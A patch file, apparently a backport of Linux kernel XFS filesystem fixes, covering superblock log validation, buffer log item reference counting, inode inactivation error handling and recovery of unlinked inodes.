++			return -EFSCORRUPTED;
++		}
++	} else if (sbp->sb_logsectsize || sbp->sb_logsectlog) {
++		xfs_notice(mp,
++		"log sector size in bytes/log2 (0x%x/0x%x) are not zero",
++			sbp->sb_logsectsize, sbp->sb_logsectlog);
++		return -EFSCORRUPTED;
++	}
++
++	if (sbp->sb_logsunit > 1) {
++		if (sbp->sb_logsunit % sbp->sb_blocksize) {
++			xfs_notice(mp,
++		"log stripe unit 0x%x bytes must be a multiple of block size",
++				sbp->sb_logsunit);
++			return -EFSCORRUPTED;
++		}
++		if (sbp->sb_logsunit > XLOG_MAX_RECORD_BSIZE) {
++			xfs_notice(mp,
++		"log stripe unit 0x%x bytes over maximum size (0x%x bytes)",
++				sbp->sb_logsunit, XLOG_MAX_RECORD_BSIZE);
++			return -EFSCORRUPTED;
++		}
++	}
++
+ 	/* Validate the realtime geometry; stolen from xfs_repair */
+ 	if (sbp->sb_rextsize * sbp->sb_blocksize > XFS_MAX_RTEXTSIZE ||
+ 	    sbp->sb_rextsize * sbp->sb_blocksize < XFS_MIN_RTEXTSIZE) {
+diff --git a/fs/xfs/libxfs/xfs_trans_inode.c b/fs/xfs/libxfs/xfs_trans_inode.c
+index 8b55470733791d..cb4796b6e693ae 100644
+--- a/fs/xfs/libxfs/xfs_trans_inode.c
++++ b/fs/xfs/libxfs/xfs_trans_inode.c
+@@ -40,9 +40,8 @@ xfs_trans_ijoin(
+ 	iip->ili_lock_flags = lock_flags;
+ 	ASSERT(!xfs_iflags_test(ip, XFS_ISTALE));
+ 
+-	/*
+-	 * Get a log_item_desc to point at the new item.
+-	 */
++	/* Reset the per-tx dirty context and add the item to the tx. */
++	iip->ili_dirty_flags = 0;
+ 	xfs_trans_add_item(tp, &iip->ili_item);
+ }
+ 
+@@ -76,17 +75,10 @@ xfs_trans_ichgtime(
+ /*
+  * This is called to mark the fields indicated in fieldmask as needing to be
+  * logged when the transaction is committed.  The inode must already be
+- * associated with the given transaction.
+- *
+- * The values for fieldmask are defined in xfs_inode_item.h.  We always log all
+- * of the core inode if any of it has changed, and we always log all of the
+- * inline data/extents/b-tree root if any of them has changed.
+- *
+- * Grab and pin the cluster buffer associated with this inode to avoid RMW
+- * cycles at inode writeback time. Avoid the need to add error handling to every
+- * xfs_trans_log_inode() call by shutting down on read error.  This will cause
+- * transactions to fail and everything to error out, just like if we return a
+- * read error in a dirty transaction and cancel it.
++ * associated with the given transaction. All we do here is record where the
++ * inode was dirtied and mark the transaction and inode log item dirty;
++ * everything else is done in the ->precommit log item operation after the
++ * changes in the transaction have been completed.
+  */
+ void
+ xfs_trans_log_inode(
+@@ -96,7 +88,6 @@ xfs_trans_log_inode(
+ {
+ 	struct xfs_inode_log_item *iip = ip->i_itemp;
+ 	struct inode		*inode = VFS_I(ip);
+-	uint			iversion_flags = 0;
+ 
+ 	ASSERT(iip);
+ 	ASSERT(xfs_isilocked(ip, XFS_ILOCK_EXCL));
+@@ -104,18 +95,6 @@ xfs_trans_log_inode(
+ 
+ 	tp->t_flags |= XFS_TRANS_DIRTY;
+ 
+-	/*
+-	 * Don't bother with i_lock for the I_DIRTY_TIME check here, as races
+-	 * don't matter - we either will need an extra transaction in 24 hours
+-	 * to log the timestamps, or will clear already cleared fields in the
+-	 * worst case.
+-	 */
+-	if (inode->i_state & I_DIRTY_TIME) {
+-		spin_lock(&inode->i_lock);
+-		inode->i_state &= ~I_DIRTY_TIME;
+-		spin_unlock(&inode->i_lock);
+-	}
+-
+ 	/*
+ 	 * First time we log the inode in a transaction, bump the inode change
+ 	 * counter if it is configured for this to occur. While we have the
+@@ -128,86 +107,10 @@ xfs_trans_log_inode(
+ 	if (!test_and_set_bit(XFS_LI_DIRTY, &iip->ili_item.li_flags)) {
+ 		if (IS_I_VERSION(inode) &&
+ 		    inode_maybe_inc_iversion(inode, flags & XFS_ILOG_CORE))
+-			iversion_flags = XFS_ILOG_CORE;
+-	}
+-
+-	/*
+-	 * If we're updating the inode core or the timestamps and it's possible
+-	 * to upgrade this inode to bigtime format, do so now.
+-	 */
+-	if ((flags & (XFS_ILOG_CORE | XFS_ILOG_TIMESTAMP)) &&
+-	    xfs_has_bigtime(ip->i_mount) &&
+-	    !xfs_inode_has_bigtime(ip)) {
+-		ip->i_diflags2 |= XFS_DIFLAG2_BIGTIME;
+-		flags |= XFS_ILOG_CORE;
+-	}
+-
+-	/*
+-	 * Inode verifiers do not check that the extent size hint is an integer
+-	 * multiple of the rt extent size on a directory with both rtinherit
+-	 * and extszinherit flags set.  If we're logging a directory that is
+-	 * misconfigured in this way, clear the hint.
+-	 */
+-	if ((ip->i_diflags & XFS_DIFLAG_RTINHERIT) &&
+-	    (ip->i_diflags & XFS_DIFLAG_EXTSZINHERIT) &&
+-	    (ip->i_extsize % ip->i_mount->m_sb.sb_rextsize) > 0) {
+-		ip->i_diflags &= ~(XFS_DIFLAG_EXTSIZE |
+-				   XFS_DIFLAG_EXTSZINHERIT);
+-		ip->i_extsize = 0;
+-		flags |= XFS_ILOG_CORE;
++			flags |= XFS_ILOG_IVERSION;
+ 	}
+ 
+-	/*
+-	 * Record the specific change for fdatasync optimisation. This allows
+-	 * fdatasync to skip log forces for inodes that are only timestamp
+-	 * dirty.
+-	 */
+-	spin_lock(&iip->ili_lock);
+-	iip->ili_fsync_fields |= flags;
+-
+-	if (!iip->ili_item.li_buf) {
+-		struct xfs_buf	*bp;
+-		int		error;
+-
+-		/*
+-		 * We hold the ILOCK here, so this inode is not going to be
+-		 * flushed while we are here. Further, because there is no
+-		 * buffer attached to the item, we know that there is no IO in
+-		 * progress, so nothing will clear the ili_fields while we read
+-		 * in the buffer. Hence we can safely drop the spin lock and
+-		 * read the buffer knowing that the state will not change from
+-		 * here.
+-		 */
+-		spin_unlock(&iip->ili_lock);
+-		error = xfs_imap_to_bp(ip->i_mount, tp, &ip->i_imap, &bp);
+-		if (error) {
+-			xfs_force_shutdown(ip->i_mount, SHUTDOWN_META_IO_ERROR);
+-			return;
+-		}
+-
+-		/*
+-		 * We need an explicit buffer reference for the log item but
+-		 * don't want the buffer to remain attached to the transaction.
+-		 * Hold the buffer but release the transaction reference once
+-		 * we've attached the inode log item to the buffer log item
+-		 * list.
+-		 */
+-		xfs_buf_hold(bp);
+-		spin_lock(&iip->ili_lock);
+-		iip->ili_item.li_buf = bp;
+-		bp->b_flags |= _XBF_INODES;
+-		list_add_tail(&iip->ili_item.li_bio_list, &bp->b_li_list);
+-		xfs_trans_brelse(tp, bp);
+-	}
+-
+-	/*
+-	 * Always OR in the bits from the ili_last_fields field.  This is to
+-	 * coordinate with the xfs_iflush() and xfs_buf_inode_iodone() routines
+-	 * in the eventual clearing of the ili_fields bits.  See the big comment
+-	 * in xfs_iflush() for an explanation of this coordination mechanism.
+-	 */
+-	iip->ili_fields |= (flags | iip->ili_last_fields | iversion_flags);
+-	spin_unlock(&iip->ili_lock);
++	iip->ili_dirty_flags |= flags;
+ }
+ 
+ int
+diff --git a/fs/xfs/xfs_attr_inactive.c b/fs/xfs/xfs_attr_inactive.c
+index 5db87b34fb6e20..89c7a9f4f93054 100644
+--- a/fs/xfs/xfs_attr_inactive.c
++++ b/fs/xfs/xfs_attr_inactive.c
+@@ -333,7 +333,6 @@ xfs_attr_inactive(
+ 	int			error = 0;
+ 
+ 	mp = dp->i_mount;
+-	ASSERT(! XFS_NOT_DQATTACHED(mp, dp));
+ 
+ 	xfs_ilock(dp, lock_mode);
+ 	if (!xfs_inode_has_attr_fork(dp))
+diff --git a/fs/xfs/xfs_bmap_util.c b/fs/xfs/xfs_bmap_util.c
+index 867645b74d889d..ce8e17ab543466 100644
+--- a/fs/xfs/xfs_bmap_util.c
++++ b/fs/xfs/xfs_bmap_util.c
+@@ -314,15 +314,13 @@ xfs_getbmap_report_one(
+ 	if (isnullstartblock(got->br_startblock) ||
+ 	    got->br_startblock == DELAYSTARTBLOCK) {
+ 		/*
+-		 * Delalloc extents that start beyond EOF can occur due to
+-		 * speculative EOF allocation when the delalloc extent is larger
+-		 * than the largest freespace extent at conversion time.  These
+-		 * extents cannot be converted by data writeback, so can exist
+-		 * here even if we are not supposed to be finding delalloc
+-		 * extents.
++		 * Take the flush completion as being a point-in-time snapshot
++		 * where there are no delalloc extents, and if any new ones
++		 * have been created racily, just skip them as being 'after'
++		 * the flush and so don't get reported.
+ 		 */
+-		if (got->br_startoff < XFS_B_TO_FSB(ip->i_mount, XFS_ISIZE(ip)))
+-			ASSERT((bmv->bmv_iflags & BMV_IF_DELALLOC) != 0);
++		if (!(bmv->bmv_iflags & BMV_IF_DELALLOC))
++			return 0;
+ 
+ 		p->bmv_oflags |= BMV_OF_DELALLOC;
+ 		p->bmv_block = -2;
+@@ -560,7 +558,9 @@ xfs_getbmap(
+ 		if (!xfs_iext_next_extent(ifp, &icur, &got)) {
+ 			xfs_fileoff_t	end = XFS_B_TO_FSB(mp, XFS_ISIZE(ip));
+ 
+-			out[bmv->bmv_entries - 1].bmv_oflags |= BMV_OF_LAST;
++			if (bmv->bmv_entries > 0)
++				out[bmv->bmv_entries - 1].bmv_oflags |=
++								BMV_OF_LAST;
+ 
+ 			if (whichfork != XFS_ATTR_FORK && bno < end &&
+ 			    !xfs_getbmap_full(bmv)) {
+diff --git a/fs/xfs/xfs_buf_item.c b/fs/xfs/xfs_buf_item.c
+index df7322ed73fa92..023d4e0385dd08 100644
+--- a/fs/xfs/xfs_buf_item.c
++++ b/fs/xfs/xfs_buf_item.c
+@@ -452,10 +452,18 @@ xfs_buf_item_format(
+  * This is called to pin the buffer associated with the buf log item in memory
+  * so it cannot be written out.
+  *
+- * We also always take a reference to the buffer log item here so that the bli
+- * is held while the item is pinned in memory. This means that we can
+- * unconditionally drop the reference count a transaction holds when the
+- * transaction is completed.
++ * We take a reference to the buffer log item here so that the BLI life cycle
++ * extends at least until the buffer is unpinned via xfs_buf_item_unpin() and
++ * inserted into the AIL.
++ *
++ * We also need to take a reference to the buffer itself as the BLI unpin
++ * processing requires accessing the buffer after the BLI has dropped the final
++ * BLI reference. See xfs_buf_item_unpin() for an explanation.
++ * If unpins race to drop the final BLI reference and only the
++ * BLI owns a reference to the buffer, then the loser of the race can have the
++ * buffer fgreed from under it (e.g. on shutdown). Taking a buffer reference per
++ * pin count ensures the life cycle of the buffer extends for as
++ * long as we hold the buffer pin reference in xfs_buf_item_unpin().
+  */
+ STATIC void
+ xfs_buf_item_pin(
+@@ -470,13 +478,30 @@ xfs_buf_item_pin(
+ 
+ 	trace_xfs_buf_item_pin(bip);
+ 
++	xfs_buf_hold(bip->bli_buf);
+ 	atomic_inc(&bip->bli_refcount);
+ 	atomic_inc(&bip->bli_buf->b_pin_count);
+ }
+ 
+ /*
+- * This is called to unpin the buffer associated with the buf log item which
+- * was previously pinned with a call to xfs_buf_item_pin().
++ * This is called to unpin the buffer associated with the buf log item which was
++ * previously pinned with a call to xfs_buf_item_pin().  We enter this function
++ * with a buffer pin count, a buffer reference and a BLI reference.
++ *
++ * We must drop the BLI reference before we unpin the buffer because the AIL
++ * doesn't acquire a BLI reference whenever it accesses it. Therefore if the
++ * refcount drops to zero, the bli could still be AIL resident and the buffer
++ * submitted for I/O at any point before we return. This can result in IO
++ * completion freeing the buffer while we are still trying to access it here.
++ * This race condition can also occur in shutdown situations where we abort and
++ * unpin buffers from contexts other that journal IO completion.
++ *
++ * Hence we have to hold a buffer reference per pin count to ensure that the
++ * buffer cannot be freed until we have finished processing the unpin operation.
++ * The reference is taken in xfs_buf_item_pin(), and we must hold it until we
++ * are done processing the buffer state. In the case of an abort (remove =
++ * true) then we re-use the current pin reference as the IO reference we hand
++ * off to IO failure handling.
+  */
+ STATIC void
+ xfs_buf_item_unpin(
+@@ -493,24 +518,18 @@ xfs_buf_item_unpin(
+ 
+ 	trace_xfs_buf_item_unpin(bip);
+ 
+-	/*
+-	 * Drop the bli ref associated with the pin and grab the hold required
+-	 * for the I/O simulation failure in the abort case. We have to do this
+-	 * before the pin count drops because the AIL doesn't acquire a bli
+-	 * reference. Therefore if the refcount drops to zero, the bli could
+-	 * still be AIL resident and the buffer submitted for I/O (and freed on
+-	 * completion) at any point before we return. This can be removed once
+-	 * the AIL properly holds a reference on the bli.
+-	 */
+ 	freed = atomic_dec_and_test(&bip->bli_refcount);
+-	if (freed && !stale && remove)
+-		xfs_buf_hold(bp);
+ 	if (atomic_dec_and_test(&bp->b_pin_count))
+ 		wake_up_all(&bp->b_waiters);
+ 
+-	 /* nothing to do but drop the pin count if the bli is active */
+-	if (!freed)
++	/*
++	 * Nothing to do but drop the buffer pin reference if the BLI is
++	 * still active.
++	 */
++	if (!freed) {
++		xfs_buf_rele(bp);
+ 		return;
++	}
+ 
+ 	if (stale) {
+ 		ASSERT(bip->bli_flags & XFS_BLI_STALE);
+@@ -522,6 +541,15 @@ xfs_buf_item_unpin(
+ 
+ 		trace_xfs_buf_item_unpin_stale(bip);
+ 
++		/*
++		 * The buffer has been locked and referenced since it was marked
++		 * stale so we own both lock and reference exclusively here. We
++		 * do not need the pin reference any more, so drop it now so
++		 * that we only have one reference to drop once item completion
++		 * processing is complete.
++		 */
++		xfs_buf_rele(bp);
++
+ 		/*
+ 		 * If we get called here because of an IO error, we may or may
+ 		 * not have the item on the AIL. xfs_trans_ail_delete() will
+@@ -538,16 +566,30 @@ xfs_buf_item_unpin(
+ 			ASSERT(bp->b_log_item == NULL);
+ 		}
+ 		xfs_buf_relse(bp);
+-	} else if (remove) {
++		return;
++	}
++
++	if (remove) {
+ 		/*
+-		 * The buffer must be locked and held by the caller to simulate
+-		 * an async I/O failure. We acquired the hold for this case
+-		 * before the buffer was unpinned.
++		 * We need to simulate an async IO failures here to ensure that
++		 * the correct error completion is run on this buffer. This
++		 * requires a reference to the buffer and for the buffer to be
++		 * locked. We can safely pass ownership of the pin reference to
++		 * the IO to ensure that nothing can free the buffer while we
++		 * wait for the lock and then run the IO failure completion.
+ 		 */
+ 		xfs_buf_lock(bp);
+ 		bp->b_flags |= XBF_ASYNC;
+ 		xfs_buf_ioend_fail(bp);
++		return;
+ 	}
++
++	/*
++	 * BLI has no more active references - it will be moved to the AIL to
++	 * manage the remaining BLI/buffer life cycle. There is nothing left for
++	 * us to do here so drop the pin reference to the buffer.
++	 */
++	xfs_buf_rele(bp);
+ }
+ 
+ STATIC uint
+diff --git a/fs/xfs/xfs_dquot.c b/fs/xfs/xfs_dquot.c
+index 8fb90da89787c6..7f071757f27857 100644
+--- a/fs/xfs/xfs_dquot.c
++++ b/fs/xfs/xfs_dquot.c
+@@ -798,7 +798,6 @@ xfs_qm_dqget_cache_insert(
+ 	error = radix_tree_insert(tree, id, dqp);
+ 	if (unlikely(error)) {
+ 		/* Duplicate found!  Caller must try again. */
+-		WARN_ON(error != -EEXIST);
+ 		mutex_unlock(&qi->qi_tree_lock);
+ 		trace_xfs_dqget_dup(dqp);
+ 		return error;
+diff --git a/fs/xfs/xfs_export.c b/fs/xfs/xfs_export.c
+index 1064c234287680..7cd09c3a82cb50 100644
+--- a/fs/xfs/xfs_export.c
++++ b/fs/xfs/xfs_export.c
+@@ -146,6 +146,20 @@ xfs_nfs_get_inode(
+ 		return ERR_PTR(error);
+ 	}
+ 
++	/*
++	 * Reload the incore unlinked list to avoid failure in inodegc.
++	 * Use an unlocked check here because unrecovered unlinked inodes
++	 * should be somewhat rare.
++	 */
++	if (xfs_inode_unlinked_incomplete(ip)) {
++		error = xfs_inode_reload_unlinked(ip);
++		if (error) {
++			xfs_force_shutdown(mp, SHUTDOWN_CORRUPT_INCORE);
++			xfs_irele(ip);
++			return ERR_PTR(error);
++		}
++	}
++
+ 	if (VFS_I(ip)->i_generation != generation) {
+ 		xfs_irele(ip);
+ 		return ERR_PTR(-ESTALE);
+diff --git a/fs/xfs/xfs_extent_busy.c b/fs/xfs/xfs_extent_busy.c
+index ad22a003f9595c..f3d328e4a4408b 100644
+--- a/fs/xfs/xfs_extent_busy.c
++++ b/fs/xfs/xfs_extent_busy.c
+@@ -236,6 +236,7 @@ xfs_extent_busy_update_extent(
+ 		 *
+ 		 */
+ 		busyp->bno = fend;
++		busyp->length = bend - fend;
+ 	} else if (bbno < fbno) {
+ 		/*
+ 		 * Case 8:
+diff --git a/fs/xfs/xfs_fsmap.c b/fs/xfs/xfs_fsmap.c
+index d8337274c74d09..062e5dc5db9f33 100644
+--- a/fs/xfs/xfs_fsmap.c
++++ b/fs/xfs/xfs_fsmap.c
+@@ -761,6 +761,7 @@ xfs_getfsmap_datadev_bnobt(
+ {
+ 	struct xfs_alloc_rec_incore	akeys[2];
+ 
++	memset(akeys, 0, sizeof(akeys));
+ 	info->missing_owner = XFS_FMR_OWN_UNKNOWN;
+ 	return __xfs_getfsmap_datadev(tp, keys, info,
+ 			xfs_getfsmap_datadev_bnobt_query, &akeys[0]);
+diff --git a/fs/xfs/xfs_fsops.c b/fs/xfs/xfs_fsops.c
+index 332da0d7b85cfa..77b14f78821421 100644
+--- a/fs/xfs/xfs_fsops.c
++++ b/fs/xfs/xfs_fsops.c
+@@ -115,11 +115,16 @@ xfs_growfs_data_private(
+ 
+ 	nb_div = nb;
+ 	nb_mod = do_div(nb_div, mp->m_sb.sb_agblocks);
+-	nagcount = nb_div + (nb_mod != 0);
+-	if (nb_mod && nb_mod < XFS_MIN_AG_BLOCKS) {
+-		nagcount--;
+-		nb = (xfs_rfsblock_t)nagcount * mp->m_sb.sb_agblocks;
++	if (nb_mod && nb_mod >= XFS_MIN_AG_BLOCKS)
++		nb_div++;
++	else if (nb_mod)
++		nb = nb_div * mp->m_sb.sb_agblocks;
++
++	if (nb_div > XFS_MAX_AGNUMBER + 1) {
++		nb_div = XFS_MAX_AGNUMBER + 1;
++		nb = nb_div * mp->m_sb.sb_agblocks;
+ 	}
++	nagcount = nb_div;
+ 	delta = nb - mp->m_sb.sb_dblocks;
+ 	/*
+ 	 * Reject filesystems with a single AG because they are not
+diff --git a/fs/xfs/xfs_icache.c b/fs/xfs/xfs_icache.c
+index dd5a664c294f56..6df826fc787c64 100644
+--- a/fs/xfs/xfs_icache.c
++++ b/fs/xfs/xfs_icache.c
+@@ -113,7 +113,7 @@ xfs_inode_alloc(
+ 	INIT_LIST_HEAD(&ip->i_ioend_list);
+ 	spin_lock_init(&ip->i_ioend_lock);
+ 	ip->i_next_unlinked = NULLAGINO;
+-	ip->i_prev_unlinked = NULLAGINO;
++	ip->i_prev_unlinked = 0;
+ 
+ 	return ip;
+ }
+@@ -454,6 +454,27 @@ xfs_inodegc_queue_all(
+ 	return ret;
+ }
+ 
++/* Wait for all queued work and collect errors */
++static int
++xfs_inodegc_wait_all(
++	struct xfs_mount	*mp)
++{
++	int			cpu;
++	int			error = 0;
++
++	flush_workqueue(mp->m_inodegc_wq);
++	for_each_online_cpu(cpu) {
++		struct xfs_inodegc	*gc;
++
++		gc = per_cpu_ptr(mp->m_inodegc, cpu);
++		if (gc->error && !error)
++			error = gc->error;
++		gc->error = 0;
++	}
++
++	return error;
++}
++
+ /*
+  * Check the validity of the inode we just found it the cache
+  */
+@@ -1490,15 +1511,14 @@ xfs_blockgc_free_space(
+ 	if (error)
+ 		return error;
+ 
+-	xfs_inodegc_flush(mp);
+-	return 0;
++	return xfs_inodegc_flush(mp);
+ }
+ 
+ /*
+  * Reclaim all the free space that we can by scheduling the background blockgc
+  * and inodegc workers immediately and waiting for them all to clear.
+  */
+-void
++int
+ xfs_blockgc_flush_all(
+ 	struct xfs_mount	*mp)
+ {
+@@ -1519,7 +1539,7 @@ xfs_blockgc_flush_all(
+ 	for_each_perag_tag(mp, agno, pag, XFS_ICI_BLOCKGC_TAG)
+ 		flush_delayed_work(&pag->pag_blockgc_work);
+ 
+-	xfs_inodegc_flush(mp);
++	return xfs_inodegc_flush(mp);
+ }
+ 
+ /*
+@@ -1841,13 +1861,17 @@ xfs_inodegc_set_reclaimable(
+  * This is the last chance to make changes to an otherwise unreferenced file
+  * before incore reclamation happens.
+  */
+-static void
++static int
+ xfs_inodegc_inactivate(
+ 	struct xfs_inode	*ip)
+ {
++	int			error;
++
+ 	trace_xfs_inode_inactivating(ip);
+-	xfs_inactive(ip);
++	error = xfs_inactive(ip);
+ 	xfs_inodegc_set_reclaimable(ip);
++	return error;
++
+ }
+ 
+ void
+@@ -1858,6 +1882,7 @@ xfs_inodegc_worker(
+ 						struct xfs_inodegc, work);
+ 	struct llist_node	*node = llist_del_all(&gc->list);
+ 	struct xfs_inode	*ip, *n;
++	unsigned int		nofs_flag;
+ 
+ 	ASSERT(gc->cpu == smp_processor_id());
+ 
+@@ -1866,14 +1891,27 @@ xfs_inodegc_worker(
+ 	if (!node)
+ 		return;
+ 
++	/*
++	 * We can allocate memory here while doing writeback on behalf of
++	 * memory reclaim.  To avoid memory allocation deadlocks set the
++	 * task-wide nofs context for the following operations.
++	 */
++	nofs_flag = memalloc_nofs_save();
++
+ 	ip = llist_entry(node, struct xfs_inode, i_gclist);
+ 	trace_xfs_inodegc_worker(ip->i_mount, READ_ONCE(gc->shrinker_hits));
+ 
+ 	WRITE_ONCE(gc->shrinker_hits, 0);
+ 	llist_for_each_entry_safe(ip, n, node, i_gclist) {
++		int	error;
++
+ 		xfs_iflags_set(ip, XFS_INACTIVATING);
+-		xfs_inodegc_inactivate(ip);
++		error = xfs_inodegc_inactivate(ip);
++		if (error && !gc->error)
++			gc->error = error;
+ 	}
++
++	memalloc_nofs_restore(nofs_flag);
+ }
+ 
+ /*
+@@ -1894,13 +1932,13 @@ xfs_inodegc_push(
+  * Force all currently queued inode inactivation work to run immediately and
+  * wait for the work to finish.
+  */
+-void
++int
+ xfs_inodegc_flush(
+ 	struct xfs_mount	*mp)
+ {
+ 	xfs_inodegc_push(mp);
+ 	trace_xfs_inodegc_flush(mp, __return_address);
+-	flush_workqueue(mp->m_inodegc_wq);
++	return xfs_inodegc_wait_all(mp);
+ }
+ 
+ /*
+diff --git a/fs/xfs/xfs_icache.h b/fs/xfs/xfs_icache.h
+index 6cd180721659b2..da58984b80d2a0 100644
+--- a/fs/xfs/xfs_icache.h
++++ b/fs/xfs/xfs_icache.h
+@@ -59,7 +59,7 @@ int xfs_blockgc_free_dquots(struct xfs_mount *mp, struct xfs_dquot *udqp,
+ 		unsigned int iwalk_flags);
+ int xfs_blockgc_free_quota(struct xfs_inode *ip, unsigned int iwalk_flags);
+ int xfs_blockgc_free_space(struct xfs_mount *mp, struct xfs_icwalk *icm);
+-void xfs_blockgc_flush_all(struct xfs_mount *mp);
++int xfs_blockgc_flush_all(struct xfs_mount *mp);
+ 
+ void xfs_inode_set_eofblocks_tag(struct xfs_inode *ip);
+ void xfs_inode_clear_eofblocks_tag(struct xfs_inode *ip);
+@@ -77,7 +77,7 @@ void xfs_blockgc_start(struct xfs_mount *mp);
+ 
+ void xfs_inodegc_worker(struct work_struct *work);
+ void xfs_inodegc_push(struct xfs_mount *mp);
+-void xfs_inodegc_flush(struct xfs_mount *mp);
++int xfs_inodegc_flush(struct xfs_mount *mp);
+ void xfs_inodegc_stop(struct xfs_mount *mp);
+ void xfs_inodegc_start(struct xfs_mount *mp);
+ void xfs_inodegc_cpu_dead(struct xfs_mount *mp, unsigned int cpu);
+diff --git a/fs/xfs/xfs_inode.c b/fs/xfs/xfs_inode.c
+index 54b707787f9070..9090852692274f 100644
+--- a/fs/xfs/xfs_inode.c
++++ b/fs/xfs/xfs_inode.c
+@@ -1620,16 +1620,7 @@ xfs_inactive_ifree(
+ 	 */
+ 	xfs_trans_mod_dquot_byino(tp, ip, XFS_TRANS_DQ_ICOUNT, -1);
+ 
+-	/*
+-	 * Just ignore errors at this point.  There is nothing we can do except
+-	 * to try to keep going. Make sure it's not a silent error.
+-	 */
+-	error = xfs_trans_commit(tp);
+-	if (error)
+-		xfs_notice(mp, "%s: xfs_trans_commit returned error %d",
+-			__func__, error);
+-
+-	return 0;
++	return xfs_trans_commit(tp);
+ }
+ 
+ /*
+@@ -1696,12 +1687,12 @@ xfs_inode_needs_inactive(
+  * now be truncated.  Also, we clear all of the read-ahead state
+  * kept for the inode here since the file is now closed.
+  */
+-void
++int
+ xfs_inactive(
+ 	xfs_inode_t	*ip)
+ {
+ 	struct xfs_mount	*mp;
+-	int			error;
++	int			error = 0;
+ 	int			truncate = 0;
+ 
+ 	/*
+@@ -1742,7 +1733,7 @@ xfs_inactive(
+ 		 * reference to the inode at this point anyways.
+ 		 */
+ 		if (xfs_can_free_eofblocks(ip, true))
+-			xfs_free_eofblocks(ip);
++			error = xfs_free_eofblocks(ip);
+ 
+ 		goto out;
+ 	}
+@@ -1752,9 +1743,21 @@ xfs_inactive(
+ 	     ip->i_df.if_nextents > 0 || ip->i_delayed_blks > 0))
+ 		truncate = 1;
+ 
+-	error = xfs_qm_dqattach(ip);
+-	if (error)
+-		goto out;
++	if (xfs_iflags_test(ip, XFS_IQUOTAUNCHECKED)) {
++		/*
++		 * If this inode is being inactivated during a quotacheck and
++		 * has not yet been scanned by quotacheck, we /must/ remove
++		 * the dquots from the inode before inactivation changes the
++		 * block and inode counts.  Most probably this is a result of
++		 * reloading the incore iunlinked list to purge unrecovered
++		 * unlinked inodes.
++		 */
++		xfs_qm_dqdetach(ip);
++	} else {
++		error = xfs_qm_dqattach(ip);
++		if (error)
++			goto out;
++	}
+ 
+ 	if (S_ISLNK(VFS_I(ip)->i_mode))
+ 		error = xfs_inactive_symlink(ip);
+@@ -1779,7 +1782,7 @@ xfs_inactive(
+ 	/*
+ 	 * Free the inode.
+ 	 */
+-	xfs_inactive_ifree(ip);
++	error = xfs_inactive_ifree(ip);
+ 
+ out:
+ 	/*
+@@ -1787,6 +1790,7 @@ xfs_inactive(
+ 	 * the attached dquots.
+ 	 */
+ 	xfs_qm_dqdetach(ip);
++	return error;
+ }
+ 
+ /*
+@@ -1837,12 +1841,17 @@ xfs_iunlink_lookup(
+ 
+ 	rcu_read_lock();
+ 	ip = radix_tree_lookup(&pag->pag_ici_root, agino);
++	if (!ip) {
++		/* Caller can handle inode not being in memory. */
++		rcu_read_unlock();
++		return NULL;
++	}
+ 
+ 	/*
+-	 * Inode not in memory or in RCU freeing limbo should not happen.
+-	 * Warn about this and let the caller handle the failure.
++	 * Inode in RCU freeing limbo should not happen.  Warn about this and
++	 * let the caller handle the failure.
+ 	 */
+-	if (WARN_ON_ONCE(!ip || !ip->i_ino)) {
++	if (WARN_ON_ONCE(!ip->i_ino)) {
+ 		rcu_read_unlock();
+ 		return NULL;
+ 	}
+@@ -1851,7 +1860,10 @@ xfs_iunlink_lookup(
+ 	return ip;
+ }
+ 
+-/* Update the prev pointer of the next agino. */
++/*
++ * Update the prev pointer of the next agino.  Returns -ENOLINK if the inode
++ * is not in cache.
++ */
+ static int
+ xfs_iunlink_update_backref(
+ 	struct xfs_perag	*pag,
+@@ -1866,7 +1878,8 @@ xfs_iunlink_update_backref(
+ 
+ 	ip = xfs_iunlink_lookup(pag, next_agino);
+ 	if (!ip)
+-		return -EFSCORRUPTED;
++		return -ENOLINK;
++
+ 	ip->i_prev_unlinked = prev_agino;
+ 	return 0;
+ }
+@@ -1910,6 +1923,64 @@ xfs_iunlink_update_bucket(
+ 	return 0;
+ }
+ 
++/*
++ * Load the inode @next_agino into the cache and set its prev_unlinked pointer
++ * to @prev_agino.  Caller must hold the AGI to synchronize with other changes
++ * to the unlinked list.
++ */
++STATIC int
++xfs_iunlink_reload_next(
++	struct xfs_trans	*tp,
++	struct xfs_buf		*agibp,
++	xfs_agino_t		prev_agino,
++	xfs_agino_t		next_agino)
++{
++	struct xfs_perag	*pag = agibp->b_pag;
++	struct xfs_mount	*mp = pag->pag_mount;
++	struct xfs_inode	*next_ip = NULL;
++	xfs_ino_t		ino;
++	int			error;
++
++	ASSERT(next_agino != NULLAGINO);
++
++#ifdef DEBUG
++	rcu_read_lock();
++	next_ip = radix_tree_lookup(&pag->pag_ici_root, next_agino);
++	ASSERT(next_ip == NULL);
++	rcu_read_unlock();
++#endif
++
++	xfs_info_ratelimited(mp,
++ "Found unrecovered unlinked inode 0x%x in AG 0x%x.  Initiating recovery.",
++			next_agino, pag->pag_agno);
++
++	/*
++	 * Use an untrusted lookup just to be cautious in case the AGI has been
++	 * corrupted and now points at a free inode.  That shouldn't happen,
++	 * but we'd rather shut down now since we're already running in a weird
++	 * situation.
++	 */
++	ino = XFS_AGINO_TO_INO(mp, pag->pag_agno, next_agino);
++	error = xfs_iget(mp, tp, ino, XFS_IGET_UNTRUSTED, 0, &next_ip);
++	if (error)
++		return error;
++
++	/* If this is not an unlinked inode, something is very wrong. */
++	if (VFS_I(next_ip)->i_nlink != 0) {
++		error = -EFSCORRUPTED;
++		goto rele;
++	}
++
++	next_ip->i_prev_unlinked = prev_agino;
++	trace_xfs_iunlink_reload_next(next_ip);
++rele:
++	ASSERT(!(VFS_I(next_ip)->i_state & I_DONTCACHE));
++	if (xfs_is_quotacheck_running(mp) && next_ip)
++		xfs_iflags_set(next_ip, XFS_IQUOTAUNCHECKED);
++	xfs_irele(next_ip);
++	return error;
++}
++
+ static int
+ xfs_iunlink_insert_inode(
+ 	struct xfs_trans	*tp,
+@@ -1941,6 +2012,8 @@ xfs_iunlink_insert_inode(
+ 	 * inode.
+ 	 */
+ 	error = xfs_iunlink_update_backref(pag, agino, next_agino);
++	if (error == -ENOLINK)
++		error = xfs_iunlink_reload_next(tp, agibp, agino, next_agino);
+ 	if (error)
+ 		return error;
+ 
+@@ -1956,6 +2029,7 @@ xfs_iunlink_insert_inode(
+ 	}
+ 
+ 	/* Point the head of the list to point to this inode. */
++	ip->i_prev_unlinked = NULLAGINO;
+ 	return xfs_iunlink_update_bucket(tp, pag, agibp, bucket_index, agino);
+ }
+ 
